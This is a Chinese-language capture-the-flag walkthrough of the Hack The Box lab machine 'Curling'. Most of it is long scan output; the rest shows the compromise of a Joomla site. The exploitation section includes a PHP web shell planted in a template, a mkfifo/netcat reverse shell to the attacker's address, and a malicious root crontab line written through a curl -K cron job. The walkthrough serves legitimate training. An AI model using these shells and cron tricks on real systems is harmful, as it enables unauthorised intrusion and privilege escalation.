Hack The Box - Curling
SYNOPSIS
Curling 是一个简单难度的 Linux 机器,需要大量枚举。密码保存在 Web 根目录的文件中。用户名可以通过允许登录的 CMS 上的帖子枚举。修改php模板反弹 shell。找到一个十六进制转储并解压它会提供一个用户密码。在枚举正在运行的进程时,会发现一个可用于root 的 cron。
Skills Ruquired
Enumeration
Skills Learned
Analyzing hex dump Curl usage
Enumeration
Port Scan
$ masscan -p1-65535 --rate=1000 -e tun0 $target
Discovered open port 22/tcp on 10.129.105.207
Discovered open port 80/tcp on 10.129.105.207
$ nmap -sC -sV -p22,80 -v $target
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap script
$ nmap -p 80 --script safe $target -v $target
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 12:21 BST
NSE: Loaded 346 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:21
NSE: [mtrace] not running for lack of privileges.
NSE: [broadcast-pppoe-discover] not running for lack of privileges.
NSE: [broadcast-ataoe-discover] No interface supplied, use -e
NSE: [url-snarf] not running for lack of privileges.
NSE: [broadcast-eigrp-discovery] not running for lack of privileges.
NSE: [broadcast-igmp-discovery] not running due to lack of privileges.
NSE: [broadcast-pim-discovery] not running for lack of privileges.
NSE: [shodan-api] Error: Please specify your ShodanAPI key with the shodan-api.apikey argument
NSE: [mrinfo] not running for lack of privileges.
NSE: [llmnr-resolve] not running due to lack of privileges.
NSE: [knx-gateway-discover] Not running due to lack of privileges.
NSE: not running for lack of privileges.
NSE: [broadcast-dhcp6-discover] not running for lack of privileges.
NSE: [lltd-discovery] not running for lack of privileges.
NSE: [broadcast-sonicwall-discover] Not running for lack of privileges.
NSE: [broadcast-dhcp-discover] not running for lack of privileges.
NSE: [targets-xml] Need to supply a file name with the targets-xml.iX argument
NSE: [broadcast-ping] not running for lack of privileges.
NSE: [broadcast-listener] not running for lack of privileges.
Completed NSE at 12:22, 40.02s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Pre-scan script results:
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Initiating Ping Scan at 12:22
Scanning 2 hosts [2 ports/host]
Completed Ping Scan at 12:22, 0.02s elapsed (2 total hosts)
Initiating Parallel DNS resolution of 2 hosts. at 12:22
Completed Parallel DNS resolution of 2 hosts. at 12:22, 0.01s elapsed
Initiating Connect Scan at 12:22
Scanning 2 hosts [1 port/host]
Discovered open port 80/tcp on 10.129.105.207
Discovered open port 80/tcp on 10.129.105.207
Completed Connect Scan at 12:22, 0.00s elapsed (2 total ports)
NSE: Script scanning 2 hosts.
Initiating NSE at 12:22
NSE: [path-mtu] not running for lack of privileges.
NSE: [ipidseq] not running for lack of privileges.
NSE: [firewalk] not running for lack of privileges.
NSE: [qscan] not running for lack of privileges.
NSE: [tls-ticketbleed] Not running due to lack of privileges.
Completed NSE at 12:22, 22.59s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Nmap scan report for 10.129.105.207
Host is up (0.015s latency).
PORT STATE SERVICE
80/tcp open http
| http-backup-finder:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
|_ http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-xssed: No previously reported XSS vuln.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 250
| http-traceroute:
|_ Possible reverse proxy detected.
|_http-referer-checker: Couldn't find any cross-domain scripts.
| http-grep:
| (1) http://10.129.105.207:80/:
| (1) ip:
|_ + 10.129.105.207
| http-headers:
| Date: Mon, 10 Oct 2022 11:22:19 GMT
| Server: Apache/2.4.29 (Ubuntu)
| Set-Cookie: c0548020854924e0aecd05ed9f5b672b=hc0lipau9p6ra5ne1u0i75f8r8; path=/; HttpOnly
| Expires: Wed, 17 Aug 2005 00:00:00 GMT
| Last-Modified: Mon, 10 Oct 2022 11:22:19 GMT
| Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| Pragma: no-cache
| Connection: close
| Content-Type: text/html; charset=utf-8
|
|_ (Request type: HEAD)
|_http-mobileversion-checker: No mobile version detected.
| http-auth-finder:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
| url method
| http://10.129.105.207:80/ FORM
| http://10.129.105.207:80/index.php/component/users/?view=reset&Itemid=101 FORM
| http://10.129.105.207:80/index.php/2-uncategorised/1-first-post-of-curling2018 FORM
| http://10.129.105.207:80/index.php FORM
| http://10.129.105.207:80/index.php/2-uncategorised/2-curling-you-know-its-true FORM
| http://10.129.105.207:80/index.php/component/users/?view=remind&Itemid=101 FORM
|_ http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling FORM
|_http-title: Home
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|
| Path: http://10.129.105.207:80/media/jui/js/bootstrap.min.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /*!
| * Bootstrap.js by @fat & @mdo
| * Copyright 2012 Twitter, Inc.
| * http://www.apache.org/licenses/LICENSE-2.0.txt
| *
| * Custom version for Joomla!
| */
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 213
| Comment:
| <!-- End Right Sidebar -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 161
| Comment:
| <!-- Begin Right Sidebar -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 42
| Comment:
| <!-- Header -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 39
| Comment:
| <!-- Body -->
|
| Path: http://10.129.105.207:80/templates/protostar/js/template.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /**
| * @package Joomla.Site
| * @subpackage Templates.protostar
| * @copyright Copyright (C) 2005 - 2018 Open Source Matters, Inc. All rights reserved.
| * @license GNU General Public License version 2 or later; see LICENSE.txt
| * @since 3.2
| */
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 27
| Comment:
| <!--[if lt IE 9]><script src="/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|
| Path: http://10.129.105.207:80/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /**
| * @preserve HTML5 Shiv 3.7.3 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed
| */
|
| Path: http://10.129.105.207:80/index.php?format=feed&type=rss
| Line number: 2
| Comment:
| <!-- generator="Joomla! - Open Source Content Management" -->
|
| Path: http://10.129.105.207:80/media/system/js/caption.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /*
| GNU General Public License version 2 or later; see LICENSE.txt
| */
|
| Path: http://10.129.105.207:80/index.php/component/users/?view=remind&Itemid=101
| Line number: 29
| Comment:
| <!--[if lt IE 9]><script src="/media/system/js/html5fallback.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 233
| Comment:
| <!-- secret.txt -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 218
| Comment:
| <!-- Footer -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 55
| Comment:
| <!-- Begin Content -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 158
| Comment:
| <!-- End Content -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 29
| Comment:
|_ <!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
| http-security-headers:
| Cache_Control:
| Header: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| Pragma:
| Header: Pragma: no-cache
| Expires:
|_ Header: Expires: Wed, 17 Aug 2005 00:00:00 GMT
|_http-date: Mon, 10 Oct 2022 11:22:18 GMT; +1h00m01s from local time.
|_http-malware-host: Host appears to be clean
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-generator: Joomla! - Open Source Content Management
Host script results:
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)
| port-states:
| tcp:
|_ open: 80
| dns-blacklist:
| SPAM
| list.quorum.to - FAIL
|_ l2.apews.org - FAIL
|_clock-skew: 1h00m00s
|_fcrdns: FAIL (No PTR record)
Nmap scan report for 10.129.105.207
Host is up (0.012s latency).
PORT STATE SERVICE
80/tcp open http
| http-backup-finder:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
|_ http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
|_http-date: Mon, 10 Oct 2022 11:22:19 GMT; +1h00m00s from local time.
|_http-title: Home
|_http-xssed: No previously reported XSS vuln.
| http-security-headers:
| Cache_Control:
| Header: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| Pragma:
| Header: Pragma: no-cache
| Expires:
|_ Header: Expires: Wed, 17 Aug 2005 00:00:00 GMT
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-malware-host: Host appears to be clean
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|
| Path: http://10.129.105.207:80/media/jui/js/bootstrap.min.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /*!
| * Bootstrap.js by @fat & @mdo
| * Copyright 2012 Twitter, Inc.
| * http://www.apache.org/licenses/LICENSE-2.0.txt
| *
| * Custom version for Joomla!
| */
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 213
| Comment:
| <!-- End Right Sidebar -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 161
| Comment:
| <!-- Begin Right Sidebar -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 42
| Comment:
| <!-- Header -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 39
| Comment:
| <!-- Body -->
|
| Path: http://10.129.105.207:80/templates/protostar/js/template.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /**
| * @package Joomla.Site
| * @subpackage Templates.protostar
| * @copyright Copyright (C) 2005 - 2018 Open Source Matters, Inc. All rights reserved.
| * @license GNU General Public License version 2 or later; see LICENSE.txt
| * @since 3.2
| */
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 27
| Comment:
| <!--[if lt IE 9]><script src="/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|
| Path: http://10.129.105.207:80/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /**
| * @preserve HTML5 Shiv 3.7.3 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed
| */
|
| Path: http://10.129.105.207:80/index.php?format=feed&type=rss
| Line number: 2
| Comment:
| <!-- generator="Joomla! - Open Source Content Management" -->
|
| Path: http://10.129.105.207:80/media/system/js/caption.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /*
| GNU General Public License version 2 or later; see LICENSE.txt
| */
|
| Path: http://10.129.105.207:80/index.php/component/users/?view=remind&Itemid=101
| Line number: 29
| Comment:
| <!--[if lt IE 9]><script src="/media/system/js/html5fallback.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 233
| Comment:
| <!-- secret.txt -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 218
| Comment:
| <!-- Footer -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 55
| Comment:
| <!-- Begin Content -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 158
| Comment:
| <!-- End Content -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 29
| Comment:
|_ <!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|_http-mobileversion-checker: No mobile version detected.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-traceroute:
|_ Possible reverse proxy detected.
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
| http-headers:
| Date: Mon, 10 Oct 2022 11:22:21 GMT
| Server: Apache/2.4.29 (Ubuntu)
| Set-Cookie: c0548020854924e0aecd05ed9f5b672b=i83sbh62st9mlm2095fgb0rmgq; path=/; HttpOnly
| Expires: Wed, 17 Aug 2005 00:00:00 GMT
| Last-Modified: Mon, 10 Oct 2022 11:22:21 GMT
| Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| Pragma: no-cache
| Connection: close
| Content-Type: text/html; charset=utf-8
|
|_ (Request type: HEAD)
| http-auth-finder:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
| url method
| http://10.129.105.207:80/ FORM
| http://10.129.105.207:80/index.php/component/users/?view=reset&Itemid=101 FORM
| http://10.129.105.207:80/index.php/2-uncategorised/1-first-post-of-curling2018 FORM
| http://10.129.105.207:80/index.php FORM
| http://10.129.105.207:80/index.php/2-uncategorised/2-curling-you-know-its-true FORM
| http://10.129.105.207:80/index.php/component/users/?view=remind&Itemid=101 FORM
|_ http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling FORM
| http-grep:
| (1) http://10.129.105.207:80/:
| (1) ip:
|_ + 10.129.105.207
|_http-generator: Joomla! - Open Source Content Management
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 250
Host script results:
|_clock-skew: 59m59s
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)
|_fcrdns: FAIL (No PTR record)
| port-states:
| tcp:
|_ open: 80
| dns-blacklist:
| SPAM
| list.quorum.to - FAIL
|_ l2.apews.org - FAIL
NSE: Script Post-scanning.
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Post-scan script results:
| reverse-index:
|_ 80/tcp: 10.129.105.207, 10.129.105.207
Read data files from: /usr/bin/../share/nmap
Nmap done: 2 IP addresses (2 hosts up) scanned in 63.92 seconds
$ searchsploit Apache 2.4.29
<SNIP>
pache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | multiple/webapps/50383.sh
发现主页 html 源码 secret.txt
注释,访问查看
view-source:http://10.129.106.27/
![[Pasted image 20221012193728.png]]
$ curl -s http://$target/secret.txt | base64 -d
Curling2018!
前往 http://10.129.106.27/administrator 目录下使用用户 Floris
密码 Curling2018!
登陆
Foothold(立足点)
Web
Joomla CMS 托管的冰壶网站:
帖子由 Super User
编写,其中一篇署名 Floris
首页HTML源码中含有一条注释
<SNIP>
</body>
<!-- secret.txt -->
</html>
访问可获取一段base64加密字段,经过 base64
解密后取得网站后台密码
$echo 'Q3VybGluZzIwMTgh' | base64 -d
Curling2018!
搜索 Joomla CMS 相关信息可以得知管理面板路径为/administrator
,以 floris 身份成功登陆
获取 www-data shell
寻找写入 php 代码的地方 转到 Extensions -> Templates
新建或寻找 php 文件,写入 php shell,保存。
<?php system($_REQUEST['pwn']); ?>
访问该页面测试 shell,获取反向 shell http://10.129.106.116/templates/beez3/dark.php?pwn=id
![[Curling_www-data.png]]
$ curl http://10.129.106.116/templates/beez3/dark.php -G --data-urlencode 'pwn=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f '
$ rlwrap nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.106.116.
Ncat: Connection from 10.129.106.116:42390.
/bin/sh: 0: can not access tty; job control turned off
whoami
www-data
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@curling:/var/www/html/templates/beez3$ ll
LATERAL MOVEMENT(横向移动)
HEX DUMP
Navigating(导航) /home/floris
文件夹下找到 password_backup
$ cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
<SNIP>
$ cp password_backup /tmp && cat /tmp/password_backup | xxd -r > /tmp/bak
$ file bak
bak: bzip2 compressed data, block size = 900k
多次压缩文件,解压方式:
$ bzip2 -d bak
bzip2: Can not guess original name for bak -- using bak.out
$ file bak.out
bak.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix
$ mv bak.out bak.gz
$ gzip -d bak.gz
$ file bak
ak: bzip2 compressed data, block size = 900k
$ bzip2 -d bak
bzip2: Can not guess original name for bak -- using bak.out
$ file bak.out
ak.out: POSIX tar archive (GNU)
$ tar xf bak.out
$ cat password.txt
5d<wdCbdZu)|hChXll #floris SSH 密码
$ ssh floris@10.129.106.116
Last login: Wed Sep 8 11:42:07 2021 from 10.10.14.15
floris@curling:~$ whoami
floris
Privilege Escalation
Enumeration
使用工具 pspy 下载较小的二进制文件并将其传输到盒子中
$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy64s
$ scp pspy64s floris@10.129.106.116:/tmp
$ cd /tmp
$ chmod +x pspy64s
./pspy64s
/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2022/10/14 10:50:01 CMD: UID=0 PID=2664 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2022/10/14 10:50:01 CMD: UID=0 PID=2663 | /usr/sbin/CRON -f
2022/10/14 10:50:01 CMD: UID=0 PID=2662 | /usr/sbin/CRON -f
2022/10/14 10:50:01 CMD: UID=0 PID=2667 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
发现 cron 在运行, curl -K
选项用于指定配置文件,cron 使用输入作为配置和输出报告。
$ cat /home/floris/admin-area/input
url = "http://127.0.0.1"
$ ls -la /home/floris/admin-area/input
-rw-rw---- 1 root floris 25 Oct 14 11:00 /home/floris/admin-area/input
输入文件归当前组所有,可以编写自己的配置。output可指定输出文件。创建一个恶意的 crontab 并覆盖 input
操作配置
首先本地机器新建恶意 crontab 文件,并启动一个简单的 http 服务器
$ cp /etc/crontab .
$ echo '* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f ' >> crontab
python3 -m http.server 80
